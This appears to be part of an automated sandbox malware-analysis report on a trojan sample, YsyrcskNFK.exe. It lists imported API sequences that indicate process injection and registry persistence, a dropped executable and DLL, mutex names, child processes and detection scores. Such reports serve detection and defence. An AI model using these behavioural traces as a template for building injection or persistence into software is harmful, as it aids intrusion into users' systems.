Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/mlb/the-alds-nlds-schedules-are-set-after-series-sweeps-in-wild-car
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_004019AA CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrlenA,OpenProcess,NtAllocateVirtualMemory,NtWriteVirtualMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualAlloc,lstrcpyA,Process32Next,CloseHandle,CloseHandle,0_2_004019AA
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 1_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,ls1_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 1_2_004019AA CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrlenA,OpenProcess,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,CreateRemoteThread,CloseHandle,FindCloseChangeNotification,CloseHandle,VirtualAlloc,lstrcpyA,Process32Next,CloseHandle,FindCloseChangeNotification,CloseHandle,1_2_004019AA
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 1_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,ls1_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 2_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,FindCloseChangeNotification,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstr2_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeFile created: C:\Windows\SysWOW64\anfidear.exeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeFile created: C:\Windows\SysWOW64\oucradeam.dllJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A190_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 1_2_00403A191_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 2_2_00403A192_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: String function: 00406718 appears 31 times
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: String function: 00406718 appears 31 times
Source: YsyrcskNFK.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engineClassification label: mal100.troj.evad.winEXE@5/4@1154/4
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeFile created: C:\Users\user\AppData\Roaming\tmp5B02.tmpJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0A
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0B
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0C
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0D
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0E
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0F
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-10
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-11
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-01
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-12
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-02
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-13
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-03
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-04
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-05
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-06
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-07
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-08
Source: C:\Windows\SysWOW64\anfidear.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-09
Source: YsyrcskNFK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exeFile read: C:\Program Files\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: YsyrcskNFK.exeReversingLabs: Detection: 86%
Source: YsyrcskNFK.exeVirustotal: Detection: 87%
Source: C:\Users\user\Desktop\YsyrcskNFK.exeFile read: C:\Users\user\Desktop\YsyrcskNFK.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\YsyrcskNFK.exe "C:\Users\user\Desktop\YsyrcskNFK.exe"
Source: C:\Users\user\Desktop\YsyrcskNFK.exeProcess created: C:\Windows\SysWOW64\anfidear.exe "C:\Windows\system32\anfidear.exe"
Source: C:\Windows\SysWOW64\anfidear.exeProcess created: C:\Windows\SysWOW64\anfidear.exe --k33p
Source: C:\Users\user\Desktop\YsyrcskNFK.exeProcess created: C:\Windows\SysWOW64\anfidear.exe "C:\Windows\system32\anfidear.exe"Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeProcess created: C:\Windows\SysWOW64\anfidear.exe --k33pJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: rasapi32.dllJump to behavior
